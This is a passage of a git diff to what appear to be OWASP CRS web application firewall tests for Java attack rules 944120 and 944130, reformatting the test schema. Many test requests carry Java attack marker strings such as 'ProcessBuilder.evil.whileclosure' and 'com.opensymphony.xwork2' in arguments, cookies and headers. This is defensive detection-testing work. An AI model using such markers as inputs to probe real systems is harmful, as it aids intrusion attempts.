+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.whileclosure"
+ output:
+ log:
+ expect_ids: [944120]
+ - test_id: 130
desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=ProcessBuilder.evil.whileclosure"
- output:
- log_contains: "id \"944120\""
- - test_title: 944120-131
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.whileclosure"
+ output:
+ log:
+ expect_ids: [944120]
+ - test_id: 131
desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: |
- {"test": "ProcessBuilder.evil.whileclosure"}
- output:
- log_contains: "id \"944120\""
- - test_title: 944120-132
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: |
+ {"test": "ProcessBuilder.evil.whileclosure"}
+ output:
+ log:
+ expect_ids: [944120]
+ - test_id: 132
desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: |
- {"ProcessBuilder.evil.whileclosure": "test"}
- output:
- log_contains: "id \"944120\""
- - test_title: 944120-133
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: |
+ {"ProcessBuilder.evil.whileclosure": "test"}
+ output:
+ log:
+ expect_ids: [944120]
+ - test_id: 133
desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-134 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 134 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; 
name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-135 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 135 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; 
boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-136 + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 136 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" + ProcessBuilder.evil.whileclosure + 
-----------------------------thisissparta--
+ output:
+ log:
+ expect_ids: [944120]
diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
index 163bba9..b08f7b2 100644
--- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
+++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
@@ -1,8481 +1,8479 @@
---
meta:
author: "spartantri, azurit"
- enabled: true
- name: "944130.yaml"
- description: "Positive tests for rule 944130"
+rule_id: 944130
tests:
- - test_title: 944130-1
+ - test_id: 1
desc: "Argument test includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=com.opensymphony.xwork2"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-2
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=com.opensymphony.xwork2"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 2
desc: "Argument name includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "com.opensymphony.xwork2=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-3
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "com.opensymphony.xwork2=test"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 3
desc: "Cookie test includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=com.opensymphony.xwork2
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-4
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=com.opensymphony.xwork2
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 4
desc: "Cookie name includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: com.opensymphony.xwork2=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-5
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: com.opensymphony.xwork2=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 5
desc: "Request header test includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: com.opensymphony.xwork2
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-6
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: com.opensymphony.xwork2
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 6
desc: "XML attribute value includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-7
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 7
desc: "XML element value includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "com.opensymphony.xwork2"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-8
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "com.opensymphony.xwork2"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 8
desc: "Nested XML element value includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "com.opensymphony.xwork2"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-9
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "com.opensymphony.xwork2"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 9
desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=com.opensymphony.xwork2"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-10
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=com.opensymphony.xwork2"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 10
desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"com.opensymphony.xwork2\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-11
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"com.opensymphony.xwork2\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 11
desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"com.opensymphony.xwork2\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-12
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"com.opensymphony.xwork2\": \"test\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 12
desc: "Argument test includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=com.sun.org.apache"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-13
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=com.sun.org.apache"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 13
desc: "Argument name includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "com.sun.org.apache=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-14
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "com.sun.org.apache=test"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 14
desc: "Cookie test includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=com.sun.org.apache
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-15
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=com.sun.org.apache
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 15
desc: "Cookie name includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: com.sun.org.apache=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-16
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: com.sun.org.apache=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 16
desc: "Request header test includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: com.sun.org.apache
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-17
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: com.sun.org.apache
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 17
desc: "XML attribute value includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-18
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
